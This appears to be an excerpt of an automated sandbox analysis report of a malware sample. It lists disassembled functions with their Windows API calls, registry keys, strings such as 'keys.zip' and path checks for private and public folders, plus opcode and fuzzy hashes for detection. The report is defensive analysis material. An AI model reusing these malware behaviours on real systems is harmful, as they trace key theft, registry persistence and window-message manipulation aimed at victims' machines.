                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?), ref: 01302891
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 0130289E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorLastPath$#680BackslashCreateCurrentFolderMakeSystem
                                                                                                                                                                                                              • String ID: 61C5C435$keys.zip
                                                                                                                                                                                                              • API String ID: 1406010380-812435629
                                                                                                                                                                                                              • Opcode ID: 0a00e5746ab3d60aace9493d9665145e940ba520d6bdae9ea973e759f882363b
                                                                                                                                                                                                              • Instruction ID: b6697379e0c047bcb437ec7cf7d8354bb7142ce406fdd6f95ec71741f6d50b34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a00e5746ab3d60aace9493d9665145e940ba520d6bdae9ea973e759f882363b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2421D6745003199BDB32AF28986CBEB7FECAF55305F148198F989C7285EA70C644CBA0
                                                                                                                                                                                                              Function 012FA060 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(00000000,00000000,?,?,?,012FA227), ref: 012FA068
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,012FA227), ref: 012FA09F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(012FA227,9e2b3f9ba,00000000,?,00000000,?), ref: 012FA0BC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(012FA227), ref: 012FA0C6
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 012FA0F9
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9e2b3f9ba,00000000,?,00000000,?), ref: 012FA116
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012FA120
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$#680
                                                                                                                                                                                                              • String ID: 9e2b3f9ba$software\microsoft
                                                                                                                                                                                                              • API String ID: 1151197818-410439933
                                                                                                                                                                                                              • Opcode ID: 6d029ea50672a2af76f5589ad7fb04ade9c3323096975c7dda4b808cb66b76d4
                                                                                                                                                                                                              • Instruction ID: 881993fc4e0e53e4f2749b6d90f1886d0edb59b803ced9e21bf367051a321b0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d029ea50672a2af76f5589ad7fb04ade9c3323096975c7dda4b808cb66b76d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57213D75A50209FBEB20DFA5CC85FFEBBB8AB44704F10455DE601E7180E7B4A7048B90
                                                                                                                                                                                                              Function 012E3420 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E3428
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 012E345F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9e2b3e09a,00000000,?,00000000,?), ref: 012E347C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E3486
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 012E34B9
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9e2b3e09a,00000000,?,00000000,?), ref: 012E34D6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E34E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$#680
                                                                                                                                                                                                              • String ID: 9e2b3e09a$software\microsoft
                                                                                                                                                                                                              • API String ID: 1151197818-554794888
                                                                                                                                                                                                              • Opcode ID: de7ccca88d04a44ec38edc534803ff76cbbaee1b28c294480a71017d92aa3092
                                                                                                                                                                                                              • Instruction ID: 617233455a8cfd7413133cf23d04e05802023060575e0f9f091d4dd0344fd40e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: de7ccca88d04a44ec38edc534803ff76cbbaee1b28c294480a71017d92aa3092
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99212875A5020AFBDB21DFA5CC89FEEBBB8FB44705F504559E601E7180E7B8A7048B90
                                                                                                                                                                                                              Function 01309160 Relevance: 15.4, APIs: 8, Strings: 2, Instructions: 394COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: /$UT
                                                                                                                                                                                                              • API String ID: 0-1626504983
                                                                                                                                                                                                              • Opcode ID: 03702dfdd83eca372370f774794f2e7215cee35b3aaa7152483691c95083a3c9
                                                                                                                                                                                                              • Instruction ID: 91b9f02c3bebf906c0ed41ce8f6006d73a98758922a04822ad5cf38c07bf7455
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03702dfdd83eca372370f774794f2e7215cee35b3aaa7152483691c95083a3c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75F1B4719042588BDF22CF69D8907EABBF9EF54318F0485D9E90CAB287D7719A84CB50
                                                                                                                                                                                                              Function 012EFBF0 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 271COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 012EFCCA
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?), ref: 012EFD7A
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,0000000D,%x,?), ref: 012EFD96
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 012EFDA5
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 012EFDFC
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,00001100,?), ref: 012EFE1D
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 012EFE9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_snprintf
                                                                                                                                                                                                              • String ID: 0$%x$Content-Length
                                                                                                                                                                                                              • API String ID: 4125937431-3838797520
                                                                                                                                                                                                              • Opcode ID: 120b90fca257372a94d71bfd006d97f03a7098eb400c84ccd90506f527a29930
                                                                                                                                                                                                              • Instruction ID: e762a85c4370a42ed39889bfdb397a6ab25263ade364ee78be92939eb852ce62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 120b90fca257372a94d71bfd006d97f03a7098eb400c84ccd90506f527a29930
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6291B2B2610702AFD714DF2CD98496AB7E9FF98614F488B2DEA1887641D730F814CBE1
                                                                                                                                                                                                              Function 012F92D0 Relevance: 15.1, APIs: 10, Instructions: 144memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 012F92D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F930C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F9338
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F935F
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,?), ref: 012F9392
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012F93AC
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F93B3
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012F93C3
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 012F93CE
                                                                                                                                                                                                              • WSASetLastError.WS2_32(?), ref: 012F9414
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorHeapLast$AllocProcessReadmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1455188016-0
                                                                                                                                                                                                              • Opcode ID: 411110cc455c16ad3da84b43976e51cbfafd9629f06d74b78ab4dfa15c45d48c
                                                                                                                                                                                                              • Instruction ID: 1b17825fe7839894e51c8ddcb577aa877ad8fd928e4f3ebaefde8041cc100f52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 411110cc455c16ad3da84b43976e51cbfafd9629f06d74b78ab4dfa15c45d48c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44515DB1E10219AFDB11DFA8D884AEEBBF8EF58704F10812DFA05E7240D73499418FA5
                                                                                                                                                                                                              Function 012E9BE0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167synchronizationwindowkeyboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?,?), ref: 012E9C41
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000000,00000000,00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?,?), ref: 012E9C5F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?,?), ref: 012E9D2F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?,?), ref: 012E9D51
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000E2AD,00000000,00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?), ref: 012E9D98
                                                                                                                                                                                                              • SendMessageW.USER32(?,?,00000003,00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?), ref: 012E9DBE
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,?,?,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?), ref: 012E9DCB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 3783495248-1167384825
                                                                                                                                                                                                              • Opcode ID: f3fe1622517df4c6e08bf50152b63b8b59a4e17a868063ce91fa8055eb07b9a0
                                                                                                                                                                                                              • Instruction ID: c37985d811d12c5446e89fac683c1611a657daf7944037f9740222464e4cf455
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3fe1622517df4c6e08bf50152b63b8b59a4e17a868063ce91fa8055eb07b9a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69519172214295AAEF35FF2C940DBE53FD89747328F88418FDA814B2C6C27645D5C3A0
                                                                                                                                                                                                              Function 012E5A20 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5A60
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5A8C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5AB3
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012E5AD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000258,000003E8), ref: 012E5B04
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000258), ref: 012E5B25
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012E5B3E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 2971961948-1167384825
                                                                                                                                                                                                              • Opcode ID: 6bf8b79360b65265f11472d9293bf7ca143af942ada23087a5391bc7688619cf
                                                                                                                                                                                                              • Instruction ID: d733506d9cbd7339f3e29eeb5d4638b52eaaf1b0476ccf6333476a4cbec29598
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bf8b79360b65265f11472d9293bf7ca143af942ada23087a5391bc7688619cf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1241E575E10209EFDB50DFA9D885AEEBBF5FB48315F64416AE904F7200E774AA018F90
                                                                                                                                                                                                              Function 012E5B50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012E5B68
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5B99
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5BC5
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5BEC
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000258,000003E8), ref: 012E5C1D
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000258), ref: 012E5C3E
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012E5C48
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 2971961948-1167384825
                                                                                                                                                                                                              • Opcode ID: e5ad147c64293cdf047415ccca42c6753e9566f080de36f68b8d9c93538a7666
                                                                                                                                                                                                              • Instruction ID: 06ba215e67eca17c5ff0f3ef64caa49d63c624633eb87dc640fdfa4d5a334de9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5ad147c64293cdf047415ccca42c6753e9566f080de36f68b8d9c93538a7666
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 883107B5E11208EFDB50DFA9D885AEDBBF9FB48314F50812AE518E7244E7749A01CF90
                                                                                                                                                                                                              Function 012FC110 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\private\), ref: 012FC139
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FC0E0,00000000,00000000,00000000), ref: 012FC186
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\public\), ref: 012FC19E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FC0C0,00000000,00000000,00000000), ref: 012FC1E2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FC1FA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FC20B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                              • String ID: \private\$\public\
                                                                                                                                                                                                              • API String ID: 677819612-281496920
                                                                                                                                                                                                              • Opcode ID: bf70e3c0beba20becd20eeea0de1efbd61b5e314d4d5a877f90925e87ba3fa3d
                                                                                                                                                                                                              • Instruction ID: 576dad0c0e4fc57d09230ae84eb58e7add5ee172c837da0df0949e321b712d95
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf70e3c0beba20becd20eeea0de1efbd61b5e314d4d5a877f90925e87ba3fa3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1231393465131E9BF7315A58DC09F96FA58DB01B49F04403CF784AB2C9C3B59455CB98
                                                                                                                                                                                                              Function 012E6980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 81registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF), ref: 012E69A2
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF), ref: 012E69C0
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 012E69DD
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?,?,00000104), ref: 012E6A4D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,9E2B3B9Fa,00000000,00000001,?,00000104,?,00000104), ref: 012E6A6F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000104), ref: 012E6A7D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$CloseOpenValuelstrcpyn
                                                                                                                                                                                                              • String ID: 9E2B3B9Fa$software\microsoft
                                                                                                                                                                                                              • API String ID: 1287607259-2470003939
                                                                                                                                                                                                              • Opcode ID: c38238d6fba1fc441af87a559e5bed3375a8e0aaf6b12e24a23c25b47c1de40c
                                                                                                                                                                                                              • Instruction ID: 2e0301b9bf46ec2a09d0c459b40f752d15f6593ac7428e4cc202e6733f47ba5b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c38238d6fba1fc441af87a559e5bed3375a8e0aaf6b12e24a23c25b47c1de40c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E121C9B1950249ABDB14EB65CCCDEFEB7BCEF28704F5081ACE245D6141E6B49F848B50
                                                                                                                                                                                                              Function 012EE250 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(012ECE3A,000000F0,7707BCB0,7707BCB0,00000000), ref: 012EE26B
                                                                                                                                                                                                              • GetLastActivePopup.USER32(012ECE3A,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECE3A,7707BCB0), ref: 012EE279
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001), ref: 012EE293
                                                                                                                                                                                                              • GetWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECE3A,7707BCB0), ref: 012EE296
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 012EE2AC
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000004), ref: 012EE2B5
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 012EE2EE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 3748940024-4251816714
                                                                                                                                                                                                              • Opcode ID: a624eef7248241cc834112f5b5d52f7c23b859dace28ac12ad7a7d3622aea454
                                                                                                                                                                                                              • Instruction ID: 0d017fe0d70364faf87f7d2a3560c289b510c5fca9c08821ceb20ee806f754a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a624eef7248241cc834112f5b5d52f7c23b859dace28ac12ad7a7d3622aea454
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6113B32A1022A6AEB32BE9D9C8CFBFB7DCAF40351F810116FB00E3091DA619541C7E4
                                                                                                                                                                                                              Function 012ED890 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012ED860,00000000,00000000,00000000,00000101,?,?,012E9D7A,?,?,?,?,012E9F49,00000000), ref: 012ED8A4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,012E9D7A,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400), ref: 012ED8BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,012E9D7A,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?), ref: 012ED8CD
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,012E9D7A,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400), ref: 012ED8DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012ED910
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012ED917
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 012ED92B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                              • String ID: P0Mw
